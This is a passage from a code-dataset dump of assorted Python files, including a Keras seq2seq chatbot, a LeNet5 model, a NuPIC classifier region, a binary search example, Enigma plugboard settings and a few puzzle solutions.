).to_list()\n","repo_name":"madokast/cctpy","sub_path":"codes/cctpy/particle.py","file_name":"particle.py","file_ext":"py","file_size_in_byte":20627,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"72134831235","text":"# -*- coding: utf-8 -*-\nimport _pickle as pk\nimport tensorflow as tf\nimport nltk\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsession = tf.Session(config=config)\nfrom keras.models import Model\nfrom keras.layers import Input, LSTM, Dense, Embedding, merge\nimport numpy as np\nfrom keras.preprocessing import sequence\n\n\ndef tokenize(sentence): \n sentence_tokens = []\n for word in nltk.word_tokenize(sentence):\n sentence_tokens.append(word)\n return sentence_tokens\n'''====================read train data========================================================================================'''\nlatent_dim = 300 # Latent dimensionality of the encoding space.\nembedding_size = 300\nnum_samples = 10000 # Number of samples to train on.\ndata_path = 'data/train.txt'\n\ninput_texts = []\ntarget_texts = []\ninput_characters = set()\ntarget_characters = set()\nvocab_characters = set()\n\nlines = open(data_path,encoding=\"utf-8\").read().split('\\n')\nfor line in lines[: min(num_samples, len(lines) - 1)]:\n input_text_str, target_text_str = line.split('\\t')\n input_text_tokens = tokenize(input_text_str)\n target_text_tokens = tokenize(target_text_str)\n input_text = input_text_tokens\n target_text = ['BOS'] + target_text_tokens + ['EOS']\n #print(target_text)\n input_texts.append(input_text)\n target_texts.append(target_text)\n for char in input_text:\n if char not in input_characters:\n input_characters.add(char)\n if char not in vocab_characters:\n vocab_characters.add(char)\n for char in target_text:\n if char not in target_characters:\n target_characters.add(char)\n if char not in vocab_characters:\n vocab_characters.add(char)\n\nvocab_characters = sorted(list(vocab_characters), reverse=True)\nvocab_size = len(vocab_characters)\nvocab_size = vocab_size + 1\nnum_encoder_tokens = vocab_size\nnum_decoder_tokens = vocab_size\n\nmax_encoder_seq_length = max([len(txt) for txt in input_texts])\nmax_decoder_seq_length = max([len(txt) for txt in target_texts])\n\nmaxlen_input = max(max_encoder_seq_length, max_decoder_seq_length)\nmax_encoder_seq_length, max_decoder_seq_length = maxlen_input, maxlen_input\nmaxlen_output = maxlen_input\n\nprint('Number of samples:', len(input_texts))\nprint('Number of unique input tokens:', num_encoder_tokens)\nprint('Number of unique output tokens:', num_decoder_tokens)\nprint('Vocab zise (num of tokens):', vocab_size)\nprint('Max sequence length for inputs:', max_encoder_seq_length)\nprint('Max sequence length for outputs:', max_decoder_seq_length)\n\n'''====================build dictionary========================================================================================'''\n\nvocab_token_index = dict(\n [(char, i+1) for i, char in enumerate(vocab_characters)])\nprint(vocab_token_index['BOS'], vocab_token_index['EOS'])\npk.dump(vocab_token_index, open(\"data/vocab_token_index\", 'wb'))\ninput_token_index = vocab_token_index\ntarget_token_index = vocab_token_index\nprint(target_token_index['BOS'], target_token_index['EOS'])\n\n'''====================Creating the training data========================================================================================'''\nunknown_token = 'NONE'\n# Replacing all words not in our vocabulary with the unknown token:\n\nfor i, sent in enumerate(input_texts):\n input_texts[i] = [w if w in vocab_token_index else unknown_token for w in sent]\n \nfor i, sent in enumerate(target_texts):\n target_texts[i] = [w if w in vocab_token_index else unknown_token for w in sent]\n \nX = np.asarray([[vocab_token_index[w] for w in sent] for sent in input_texts])\nY = np.asarray([[vocab_token_index[w] for w in sent] for sent in target_texts])\n\nencoder_input_data = sequence.pad_sequences(X, maxlen=maxlen_input)\ndecoder_input_data = sequence.pad_sequences(Y, maxlen=maxlen_output, padding='post')\n\n'''====================build model=============================================================================================================='''\nembedding_matrix = np.load('data/embedding_matrix.npy')\nprint(\"load embedding_matrix done\")\n\nencoder_inputs = Input(shape=(max_encoder_seq_length,),dtype='int32', name='encoder_input')\nenc_wordembedding = Embedding(input_dim=num_encoder_tokens, output_dim=embedding_size, weights=[embedding_matrix],input_length=max_encoder_seq_length)\nencoder_embedding = enc_wordembedding(encoder_inputs)\nLSTM_encoder = LSTM(latent_dim, init='lecun_uniform')\nencoder_embedding_LSTM = LSTM_encoder(encoder_embedding)\n\ndecoder_inputs = Input(shape=(max_decoder_seq_length,), dtype='int32', name='decorder_input')\ndec_wordembedding = Embedding(input_dim=num_encoder_tokens, output_dim=embedding_size, weights=[embedding_matrix],input_length=max_encoder_seq_length)\ndecoder_embedding = dec_wordembedding(decoder_inputs)\nLSTM_decoder = LSTM(latent_dim, init='lecun_uniform')\ndecoder_embedding_LSTM = LSTM_decoder(decoder_embedding)\n\n'''\nmerge_layer = merge([encoder_embedding_LSTM, decoder_embedding_LSTM], mode='concat', concat_axis=1)\ndense_outputs = Dense(int(num_decoder_tokens/2), activation='relu')(merge_layer)\ndense_layer = Dense(num_decoder_tokens, activation='softmax')\noutputs = dense_layer(dense_outputs)\n'''\nattn = merge([encoder_embedding_LSTM, decoder_embedding_LSTM], mode='dot', dot_axes=[1, 1])\n#attn = Flatten()(attn)\nattn = Dense(latent_dim)(attn)\n\ndense_outputs = Dense(int(num_decoder_tokens/2), activation='relu')(attn)\ndense_layer = Dense(num_decoder_tokens, activation='softmax')\noutputs = dense_layer(dense_outputs)\n\n\nmodel = Model([encoder_inputs, decoder_inputs], outputs=[outputs])\nmodel.compile(optimizer='adam', loss='categorical_crossentropy')\n\n'''====================decode_sequence=============================================================================================================='''\n\nreverse_vocab_char_index = dict(\n (i, char) for char, i in vocab_token_index.items())\nreverse_input_char_index = reverse_vocab_char_index\nreverse_target_char_index = reverse_vocab_char_index\n\ndef decode_sequence(input_seq):\n # Encode the input as state vectors.\n \n model.load_weights('model/model.h5')\n # Generate empty target sequence of length 1.\n target_seq = np.zeros((1, max_decoder_seq_length))\n # Populate the first character of target sequence with the start character.\n target_seq[0, -1] = target_token_index['BOS']\n\n # Sampling loop for a batch of sequences\n # (to simplify, here we assume a batch of size 1).\n stop_condition = False\n decoded_sentence = ''\n while not stop_condition:\n prediction = model.predict([input_seq, target_seq])\n\n # Sample a token\n pred_probs = prediction[0,:]\n prob = np.max(pred_probs)\n sampled_token_index = np.argmax(prediction)\n sampled_char = reverse_target_char_index[sampled_token_index]\n decoded_sentence += sampled_char + ' '\n\n # Exit condition: either hit max length\n # or find stop character.\n if sampled_char == 'EOS' or len(decoded_sentence) > max_decoder_seq_length:\n stop_condition = True\n\n # Update the target sequence (of length 1).\n # target_seq = np.zeros((1, max_decoder_seq_length))\n target_seq[0, 0:-1] = target_seq[0, 1:]\n target_seq[0, -1] = sampled_token_index\n return decoded_sentence\n'''==================testing=============================================================================================================='''\ndef test():\n num_samples = 100 # Number of samples to train on.\n inputList=[]\n input_texts=[]\n target_texts=[]\n data_path = 'data/test.txt'\n vocab_token_index['NONE'] = 0\n lines = open(data_path,encoding=\"utf-8\").read().split('\\n')\n for line in lines[: min(num_samples, len(lines) - 1)]:\n # update for tokenize string to word tokens\n # input_text, target_text = line.split('\\t')\n input_text_str, target_text = line.split('\\t')\n input_text_tokens = tokenize(input_text_str)\n input_texts.append(input_text_tokens)\n inputList.append(input_text_tokens)\n target_texts.append(target_text)\n for i, sent in enumerate(input_texts):\n input_texts[i] = [w if w in vocab_token_index else 'NONE' for w in sent]\n\n X = np.asarray([[vocab_token_index[w] for w in sent] for sent in input_texts])\n encoder_input_data = sequence.pad_sequences(X, maxlen=maxlen_input)\n\n return encoder_input_data, input_texts, target_texts, inputList\n\nwith open(\"result/testResult.txt\",'w', encoding='UTF-8') as f:\n encoder_input_data, input_texts, target_texts, inputList = test()\n for seq_index in range(len(input_texts)):\n # Take one sequence (part of the training test)\n # for trying out decoding.\n print(seq_index)\n input_seq = encoder_input_data[seq_index: seq_index + 1]\n decoded_sentence = decode_sequence(input_seq)\n #print('-')\n #print('Input sentence:', inputList[seq_index])\n #print('Answer sentence:', target_texts[seq_index])\n #print('Decoded sentence:', decoded_sentence)\n inputStr = ' '.join(inputList[seq_index])\n decoded_sentence = decoded_sentence.replace('EOS','')\n line = 'post: ' + '\\n' + inputStr + '\\n' + '\\n' +'Answer sentence: ' + '\\n' + target_texts[seq_index] + '\\n' + '\\n' +\"Decoded sentence:\" + '\\n' + decoded_sentence\n f.write(line + '\\n')\n f.writelines(\"=========================================\" + '\\n') \n \nf.close() \nprint('DONE')\n \n \n \n \n \n \n ","repo_name":"kevinhkliu/AI2017FALL","sub_path":"final/training/seq2seqEmbedChabotsTestEngWordLevel.py","file_name":"seq2seqEmbedChabotsTestEngWordLevel.py","file_ext":"py","file_size_in_byte":9551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"75687364","text":"import heapq\n\nclass Solution:\n\tdef secondHighest(self, s: str) -> int:\n\n\t\tnumberlist = []\n\n\t\tfor c in s:\n\t\t\tif c.isnumeric() and c not in numberlist:\n\t\t\t\tif len(numberlist) < 2:\n\t\t\t\t\theapq.heappush(numberlist, c)\n\t\t\t\telif numberlist[0] < c:\n\t\t\t\t\theapq.heapreplace(numberlist, c)\n\n\n\t\tif len(numberlist) > 1:\n\t\t\treturn numberlist[0]\n\n\t\treturn -1","repo_name":"PanJianTing/LeetCode","sub_path":"1796_SecondLargestDigitInAString.py","file_name":"1796_SecondLargestDigitInAString.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13350194524","text":"import sys, os\nsys.path.insert(1,\"../../\")\nimport h2o\nfrom tests import pyunit_utils\nfrom h2o.utils.typechecks import assert_is_type\nfrom h2o.assembly import *\nfrom h2o.transforms.preprocessing import *\nimport os\n\ndef h2oassembly_to_pojo():\n \"\"\"\n Python API test: H2OAssembly.to_pojo(pojo_name=u'', path=u'', get_jar=True)\n\n Copied from pyunit_assembly_demo.py\n \"\"\"\n\n fr = h2o.import_file(pyunit_utils.locate(\"smalldata/iris/iris_wheader.csv\"),\n col_types=[\"numeric\",\"numeric\",\"numeric\",\"numeric\",\"string\"])\n assembly = H2OAssembly(steps=[(\"col_select\", H2OColSelect([\"sepal_len\", \"petal_len\", \"class\"])),\n (\"cos_sep_len\", H2OColOp(op=H2OFrame.cos, col=\"sepal_len\", inplace=True)),\n (\"str_cnt_species\",\n H2OColOp(op=H2OFrame.countmatches, col=\"class\", inplace=False, pattern=\"s\"))])\n\n result = assembly.fit(fr) # fit the assembly\n assert_is_type(result, H2OFrame)\n\n results_dir = os.path.join(os.getcwd(), \"results\")\n if os.path.isdir(results_dir):\n assembly.to_pojo(pojo_name=\"iris_munge\", path=results_dir, get_jar=True)\n assert os.path.isfile(os.path.join(results_dir, \"h2o-genmodel.jar\")), \"H2OAssembly.to_pojo() \" \\\n \"command is not working.\"\n else:\n assembly.to_pojo(pojo_name=\"iris_munge\", path='', get_jar=False) # just print pojo to screen\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(h2oassembly_to_pojo)\nelse:\n h2oassembly_to_pojo()\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/testdir_apis/H2OAssembly/pyunit_h2oassembly_to_pojo.py","file_name":"pyunit_h2oassembly_to_pojo.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"4427658134","text":"try: import cPickle as pickle\r\nexcept: import pickle\r\nfrom .metrics import *\r\nfrom dynamicgem.utils import evaluation_util, graph_util\r\nimport networkx as nx\r\nimport numpy as np\r\n\r\n\r\ndef evaluateStaticGraphReconstruction(digraph, \r\n graph_embedding,\r\n X_stat, \r\n node_l=None, \r\n sample_ratio_e=None, \r\n file_suffix=None,\r\n is_undirected=True,\r\n is_weighted=False):\r\n node_num = digraph.number_of_nodes()\r\n # evaluation\r\n if sample_ratio_e:\r\n eval_edge_pairs = evaluation_util.getRandomEdgePairs(\r\n node_num,\r\n sample_ratio_e,\r\n is_undirected\r\n )\r\n else:\r\n eval_edge_pairs = None\r\n if file_suffix is None:\r\n estimated_adj = graph_embedding.get_reconstructed_adj(X_stat, node_l)\r\n else:\r\n estimated_adj = graph_embedding.get_reconstructed_adj(\r\n X_stat,\r\n node_l,\r\n file_suffix\r\n \r\n )\r\n predicted_edge_list = evaluation_util.getEdgeListFromAdjMtx(\r\n estimated_adj,\r\n is_undirected=is_undirected,\r\n edge_pairs=eval_edge_pairs\r\n )\r\n MAP = metrics.computeMAP(predicted_edge_list, digraph)\r\n prec_curv, _ = metrics.computePrecisionCurve(predicted_edge_list, digraph)\r\n # If weighted, compute the error in reconstructed weights of observed edges\r\n if is_weighted:\r\n digraph_adj = nx.to_numpy_matrix(digraph)\r\n estimated_adj[digraph_adj == 0] = 0\r\n err = np.linalg.norm(digraph_adj - estimated_adj)\r\n err_baseline = np.linalg.norm(digraph_adj)\r\n else:\r\n err = None\r\n err_baseline = None\r\n return (MAP, prec_curv, err, err_baseline)\r\n\r\n\r\ndef expGR(digraph, \r\n graph_embedding,\r\n X, \r\n n_sampled_nodes, \r\n rounds,\r\n res_pre, \r\n m_summ,\r\n file_suffix=None,\r\n is_undirected=True,\r\n sampling_scheme=\"rw\"):\r\n print('\\tGraph Reconstruction')\r\n n_sampled_nodes = int(n_sampled_nodes)\r\n summ_file = open('%s_%s.grsumm' % (res_pre, m_summ), 'w')\r\n summ_file.write('Method\\t%s\\n' % metrics.getMetricsHeader())\r\n if digraph.number_of_nodes() <= n_sampled_nodes:\r\n rounds = 1\r\n MAP = [None] * rounds\r\n prec_curv = [None] * rounds\r\n err = [None] * rounds\r\n err_b = [None] * rounds\r\n n_nodes = [None] * rounds\r\n n_edges = [None] * rounds\r\n for round_id in range(rounds):\r\n if sampling_scheme == \"u_rand\":\r\n sampled_digraph, node_l = graph_util.sample_graph(\r\n digraph,\r\n n_sampled_nodes=n_sampled_nodes\r\n )\r\n else:\r\n sampled_digraph, node_l = graph_util.sample_graph_rw_int(\r\n digraph,\r\n n_sampled_nodes=n_sampled_nodes\r\n )\r\n n_nodes[round_id] = sampled_digraph.number_of_nodes()\r\n n_edges[round_id] = sampled_digraph.number_of_edges()\r\n print('\\t\\tRound: %d, n_nodes: %d, n_edges:%d\\n' % (round_id,\r\n n_nodes[round_id],\r\n n_edges[round_id]))\r\n sampled_X = X[node_l]\r\n # sampled_X = np.expand_dims(sampled_X,axis=1)\r\n MAP[round_id], prec_curv[round_id], err[round_id], err_b[round_id] = \\\r\n evaluateStaticGraphReconstruction(sampled_digraph, \r\n graph_embedding,\r\n sampled_X, \r\n node_l,\r\n file_suffix= file_suffix,\r\n is_undirected=is_undirected\r\n )\r\n try:\r\n summ_file.write('Err: %f/%f\\n' % (np.mean(err), np.std(err)))\r\n summ_file.write('Err_b: %f/%f\\n' % (np.mean(err_b), np.std(err_b)))\r\n except TypeError:\r\n pass\r\n summ_file.write('%f/%f\\t%s\\n' % (np.mean(MAP), np.std(MAP),\r\n metrics.getPrecisionReport(prec_curv[0],\r\n n_edges[0])))\r\n pickle.dump([n_nodes,\r\n n_edges,\r\n MAP,\r\n prec_curv,\r\n err,\r\n err_b],\r\n open('%s_%s.gr' % (res_pre, m_summ), 'wb'))\r\n return np.mean(np.array(MAP))\r\n","repo_name":"palash1992/DynamicGEM","sub_path":"dynamicgem/evaluation/evaluate_graph_reconstruction.py","file_name":"evaluate_graph_reconstruction.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","stars":335,"dataset":"github-code","pt":"61"} +{"seq_id":"20214014658","text":"# This function takes a sorted list and an element to search for as input\ndef binary_search(list, element):\n middle = 0 # Initialize the middle index\n start = 0 # Initialize the start index\n end = len(list) # Initialize the end index to the length of the list\n steps = 0 # Initialize the step count to 0\n\n # Continue searching as long as the start index is less than or equal to the end index\n while (start <= end):\n # Print the current step number and the current sublist being searched\n print(f\"Step:{steps},{list[start:end+1]}\")\n\n steps += 1 # Increment the step count\n middle = (start + end) // 2 # Calculate the middle index\n\n # If the middle element is the target, return its index\n if element == list[middle]:\n return middle\n # If the target is less than the middle element, search the left half of the list\n if element < list[middle]:\n end = middle - 1\n # If the target is greater than the middle element, search the right half of the list\n else:\n start = middle + 1\n\n # If the target element is not found, return -1\n return -1\n\n\n# Test the function with a sample list and target element\nmy_list = [1, 2, 3, 4, 5, 6, 7, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\ntarget = 14\n\nbinary_search(my_list, target)","repo_name":"kongo02/binary_search-Python","sub_path":"binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1125478694","text":"\"\"\" Plugboard pairings\n\n\tUp to 10 alphabetic pairings could be made via physical wire connections.\n\tThis was the final component of the encryption before the accompanying lamp\n\twould be lit for a keypress.\n\n\tTaken from the 31st, 30th, and 29th from keylist #649, link below:\n\thttps://en.wikipedia.org/wiki/Enigma_machine#/media/File:Enigma_keylist_3_rotor.jpg\n\"\"\"\n\nplugboard31 = { 'S':'Z',\n\t\t\t\t'G':'T',\n\t\t\t\t'D':'V',\n\t\t\t\t'K':'U',\n\t\t\t\t'F':'O',\n\t\t\t\t'M':'Y',\n\t\t\t\t'E':'W',\n\t\t\t\t'J':'N',\n\t\t\t\t'I':'X',\n\t\t\t\t'L':'Q' }\n\nplugboard30 = { 'I':'S',\n\t\t\t\t'E':'V',\n\t\t\t\t'M':'X',\n\t\t\t\t'R':'W',\n\t\t\t\t'D':'T',\n\t\t\t\t'U':'Z',\n\t\t\t\t'J':'Q',\n\t\t\t\t'A':'O',\n\t\t\t\t'C':'H',\n\t\t\t\t'N':'Y' }\n\nplugboard29 = { 'D':'J',\n\t\t\t\t'A':'T',\n\t\t\t\t'C':'V',\n\t\t\t\t'I':'O',\n\t\t\t\t'E':'R',\n\t\t\t\t'Q':'S',\n\t\t\t\t'L':'W',\n\t\t\t\t'P':'Z',\n\t\t\t\t'F':'N',\n\t\t\t\t'B':'H' }","repo_name":"ethanjpark/enigma_python","sub_path":"src/plugboard.py","file_name":"plugboard.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"3604418605","text":"\n\n\nlinha = '~' * 50\ntitulo = '\\33[1:35mCadastro de vendas\\33[m'\nmenu = '\\33[1:33mMenu principal\\33[m'\nprint(linha)\nprint(titulo.center(50))\nprint(linha)\nprint(menu.center(50))\nprint(linha)\nopção = 0\nwhile opção != 5:\n print(''' \n \\33[1:33m1\\33[m - \\33[0:34mCadastrar Clientes\\33[m\n \\33[1:33m2\\33[m - \\33[0:34mCadastrar Motos\\33[m\n \\33[1:33m3\\33[m - \\33[0:34mComprar Motos\\33[m\n \\33[1:33m4\\33[m - \\33[0:34mConsultar Vendas\\33[m\n \\33[1:33m5\\33[m - \\33[0:34mSair\\33[m\n ''')\n opção = int(input(' O que deseja fazer? '))\n\n if opção == 1:\n clientes = []\n while True:\n clientes.append(str(input('Qual o seu nome? ')))\n resp = str(input('Deseja cadastrar mais algum cliente?[S/N]'))\n if resp in 'nN':\n break\n elif opção == 2:\n motos = []\n while True:\n motos.append(str(input('Marca: ')))\n motos.append(str(input('Modelo: ')))\n motos.append(int(input('Ano: ')))\n motos.append(float(input('Preço: ')))\n\n resp = str(input('Quer adicionar mais motos? [S/N] '))\n if resp in 'nN':\n break","repo_name":"yanbernardo/tentativacrud2","sub_path":"AP2pratica_de_programação/venv/CRUD/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23930029147","text":"import enum\n\n\nclass PhaseHandler:\n def __init__(self, agent):\n self.agent = agent\n\n # return true if phase is equal to current phase\n def phase_is(self, phase):\n return self.agent.phase == phase\n\n\nclass Phase(enum.Enum):\n CHOOSE_ROOM = 1\n GO_TO_ROOM = 2\n OPEN_DOOR = 3\n SEARCH_ROOM = 4\n CHOOSE_GOAL = 5\n GRAB_GOAL = 6\n DROP_GOAL = 7\n DONE = 8\n","repo_name":"plindhorst/Collaborative-Agent","sub_path":"Group58Agent/PhaseHandler.py","file_name":"PhaseHandler.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"13165571817","text":"import torch\nfrom torch import nn\n\nfrom hust_bearing.models.core import register_model\n\n\n@register_model(\"lenet5\")\nclass LeNet5(nn.Module):\n def __init__(self, num_classes: int) -> None:\n super().__init__()\n # 1st layer\n self.conv1 = nn.Conv2d(1, 6, kernel_size=5)\n self.tanh1 = nn.Tanh()\n self.pool1 = nn.AvgPool2d(kernel_size=2)\n # 2nd layer\n self.conv2 = nn.Conv2d(6, 16, kernel_size=5)\n self.tanh2 = nn.Tanh()\n self.pool2 = nn.AvgPool2d(kernel_size=2)\n # Flatten layer\n self.flatten = nn.Flatten()\n # 3rd layer\n self.fc3 = nn.Linear(16 * 13 * 13, 120)\n self.tanh3 = nn.Tanh()\n # 4th layer\n self.fc4 = nn.Linear(120, 84)\n self.tanh4 = nn.Tanh()\n # 5th layer\n self.fc5 = nn.Linear(84, num_classes)\n\n def forward(self, inputs: torch.Tensor) -> torch.Tensor:\n conv1 = self.pool1(self.tanh1(self.conv1(inputs)))\n conv2 = self.pool2(self.tanh2(self.conv2(conv1)))\n flatten = self.flatten(conv2)\n fc3 = self.tanh3(self.fc3(flatten))\n fc4 = self.tanh4(self.fc4(fc3))\n return self.fc5(fc4)\n","repo_name":"vuong-viet-hung/cwru-bearing-fault-classification","sub_path":"hust_bearing/models/lenet5.py","file_name":"lenet5.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31132434201","text":"import numpy\nfrom PyRegion import PyRegion\nfrom nupic.algorithms.cla_classifier_factory import CLAClassifierFactory\n\n###############################################################################\nclass CLAClassifierRegion(PyRegion):\n \"\"\"\n CLAClassifierRegion implements a CLA specific classifier that accepts a binary\n input from the level below (the \"activationPattern\") and information from the\n sensor and encoders (the \"classification\") describing the input to the system\n at that time step.\n\n When learning, for every bit in activation pattern, it records a history of the\n classification each time that bit was active. The history is bounded by a\n maximum allowed age so that old entries are thrown away.\n\n For inference, it takes an ensemble approach. For every active bit in the\n activationPattern, it looks up the most likely classification(s) from the\n history stored for that bit and then votes across these to get the resulting\n classification(s).\n\n The caller can choose to tell the region that the classifications for\n iteration N+K should be aligned with the activationPattern for iteration N.\n This results in the classifier producing predictions for K steps in advance.\n Any number of different K's can be specified, allowing the classifier to learn\n and infer multi-step predictions for a number of steps in advance.\n \"\"\"\n \n###############################################################################\n @classmethod\n def getSpec(cls):\n ns = dict(\n description=CLAClassifierRegion.__doc__,\n singleNodeOnly=True,\n\n # The inputs and outputs are not used in this region because they are\n # either sparse vectors or dictionaries and hence don't fit the \"vector\n # of real\" input/output pattern.\n # There is a custom compute() function provided that accepts the\n # inputs and outputs.\n inputs=dict(\n categoryIn=dict(\n description='Category of the input sample',\n dataType='Real32',\n count=1,\n required=True,\n regionLevel=True,\n isDefaultInput=False,\n requireSplitterMap=False),\n\n bottomUpIn=dict(\n description='Belief values over children\\'s groups',\n dataType='Real32',\n count=0,\n required=True,\n regionLevel=False,\n isDefaultInput=True,\n requireSplitterMap=False),\n ),\n\n outputs=dict(),\n\n parameters=dict(\n learningMode=dict(\n description='Boolean (0/1) indicating whether or not a region '\n 'is in learning mode.',\n dataType='UInt32',\n count=1,\n constraints='bool',\n defaultValue=1,\n accessMode='ReadWrite'),\n\n inferenceMode=dict(\n description='Boolean (0/1) indicating whether or not a region '\n 'is in inference mode.',\n dataType='UInt32',\n count=1,\n constraints='bool',\n defaultValue=0,\n accessMode='ReadWrite'),\n\n steps=dict(\n description='Comma separated list of the desired steps of '\n 'prediction that the classifier should learn',\n dataType=\"Byte\",\n count=0,\n constraints='',\n defaultValue='1',\n accessMode='Create'),\n\n alpha=dict(\n description='The alpha used to compute running averages of the '\n 'bucket duty cycles for each activation pattern bit. A lower '\n 'alpha results in longer term memory',\n dataType=\"Real32\",\n count=1,\n constraints='',\n defaultValue=0.001,\n accessMode='Create'),\n\n implementation=dict(\n description='The classifier implementation to use.',\n accessMode='ReadWrite',\n dataType='Byte',\n count=0,\n constraints='enum: py, cpp'),\n\n clVerbosity=dict(\n description='An integer that controls the verbosity level, '\n '0 means no verbose output, increasing integers '\n 'provide more verbosity.',\n dataType='UInt32',\n count=1,\n constraints='',\n defaultValue=0 ,\n accessMode='ReadWrite'),\n\n ),\n commands=dict()\n )\n\n return ns\n\n ###############################################################################\n def __init__(self,\n steps='1',\n alpha=0.001,\n clVerbosity=0,\n implementation=None,\n ):\n\n # Convert the steps designation to a list\n self.steps = steps\n self.stepsList = eval(\"[%s]\" % (steps))\n self.alpha = alpha\n self.verbosity = clVerbosity\n\n # Initialize internal structures\n self._claClassifier = CLAClassifierFactory.create(\n steps=self.stepsList,\n alpha=self.alpha,\n verbosity=self.verbosity,\n implementation=implementation,\n )\n self.learningMode = True\n self.inferenceMode = False\n\n self._initEphemerals()\n\n\n ###############################################################################\n def _initEphemerals(self):\n pass\n\n\n ###############################################################################\n def initialize(self, dims, splitterMaps):\n pass\n\n ###############################################################################\n def clear(self):\n self._claClassifier.clear()\n\n\n ###############################################################################\n def getParameter(self, name, index=-1):\n \"\"\"\n Get the value of the parameter.\n\n @param name -- the name of the parameter to retrieve, as defined\n by the Node Spec.\n \"\"\"\n # If any spec parameter name is the same as an attribute, this call\n # will get it automatically, e.g. self.learningMode\n return PyRegion.getParameter(self, name, index)\n\n\n ###############################################################################\n def setParameter(self, name, index, value):\n \"\"\"\n Set the value of the parameter.\n\n @param name -- the name of the parameter to update, as defined\n by the Node Spec.\n @param value -- the value to which the parameter is to be set.\n \"\"\"\n if name == \"learningMode\":\n self.learningMode = bool(int(value))\n elif name == \"inferenceMode\":\n self.inferenceMode = bool(int(value))\n else:\n return PyRegion.setParameter(self, name, index, value)\n\n\n ###############################################################################\n def reset(self):\n pass\n\n\n ###############################################################################\n def compute(self, inputs, outputs):\n \"\"\"\n Process one input sample.\n This method is called by the runtime engine.\n\n We don't use this method in this region because the inputs and outputs don't\n fit the standard \"vector of reals\" used by the engine. Instead, call\n the customCompute() method directly\n \"\"\"\n\n pass\n\n ###############################################################################\n def customCompute(self, recordNum, patternNZ, classification):\n \"\"\"\n Process one input sample.\n This method is called by outer loop code outside the nupic-engine. We\n use this instead of the nupic engine compute() because our inputs and\n outputs aren't fixed size vectors of reals.\n\n Parameters:\n --------------------------------------------------------------------\n patternNZ: list of the active indices from the output below\n classification: dict of the classification information:\n bucketIdx: index of the encoder bucket\n actValue: actual value going into the encoder\n\n retval: dict containing inference results, one entry for each step in\n self.steps. The key is the number of steps, the value is an\n array containing the relative likelihood for each bucketIdx\n starting from bucketIdx 0.\n\n for example:\n {1 : [0.1, 0.3, 0.2, 0.7]\n 4 : [0.2, 0.4, 0.3, 0.5]}\n \"\"\"\n\n return self._claClassifier.compute( recordNum=recordNum,\n patternNZ=patternNZ,\n classification=classification,\n learn = self.learningMode,\n infer = self.inferenceMode)\n\n\n\n###############################################################################\nif __name__=='__main__':\n from nupic.engine import Network\n n = Network()\n classifier = n.addRegion(\n 'classifier',\n 'py.CLAClassifierRegion',\n '{ steps: \"1,2\", maxAge: 1000}'\n )\n","repo_name":"tkaitchuck/nupic","sub_path":"py/regions/CLAClassifierRegion.py","file_name":"CLAClassifierRegion.py","file_ext":"py","file_size_in_byte":8867,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74630805633","text":"# Fibonacci numbers module\r\n\r\ndef fib(n): # write Fibonacci series up to n\r\n a, b = 0, 1\r\n while a < n:\r\n print(a, end=' ')\r\n a, b = b, a+b\r\n print()\r\n\r\ndef fib2(n): # return Fibonacci series up to n\r\n result = []\r\n a, b = 0, 1\r\n while a < n:\r\n result.append(a)\r\n a, b = b, a+b\r\n return result\r\n\r\n''' COMO CONSTRUIR MÓDULOS\r\nImporte esse módulo com o seguinte comando:\r\n\r\n>>> import d.fibo\r\nThis does not add the names of the functions defined in fibo directly to the current namespace (see Escopos e espaços de nomes do Python for more details); it only adds the module name fibo there. Using the module name you can access the functions:\r\n\r\n>>> fibo.fib(1000)\r\n...0 1 1 2 3 5 8 13 21 34 55 89 144 233 377 610 987\r\n>>> fibo.fib2(100)\r\n[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89]\r\n>>> fibo.__name__\r\n'fibo'\r\nSe pretender usar uma função muitas vezes, você pode atribui-lá a um nome local:\r\n\r\n>>>\r\n>>> fib = fibo.fib\r\n>>> fib(500)\r\n0 1 1 2 3 5 8 13 21 34 55 89 144 233 377\r\n'''","repo_name":"Danilex22/I-N-I-C-I-A-N-T-E-S---Top-10-projetos-python","sub_path":"d.fibo.py","file_name":"d.fibo.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30552080023","text":"# Determine the time when a capsule can be dropped based on the rotation of several discs\n\n\nclass Disc:\n def __init__(self, positions, start):\n self.positions = positions\n self.current = start\n\n\n'''\ndiscs = [\n Disc(5, 4),\n Disc(2, 1)\n]\n'''\n\n'''\nDisc #1 has 13 positions; at time=0, it is at position 11.\nDisc #2 has 5 positions; at time=0, it is at position 0.\nDisc #3 has 17 positions; at time=0, it is at position 11.\nDisc #4 has 3 positions; at time=0, it is at position 0.\nDisc #5 has 7 positions; at time=0, it is at position 2.\nDisc #6 has 19 positions; at time=0, it is at position 17.\n'''\ndiscs = [\n Disc(13, 11),\n Disc(5, 0),\n Disc(17, 11),\n 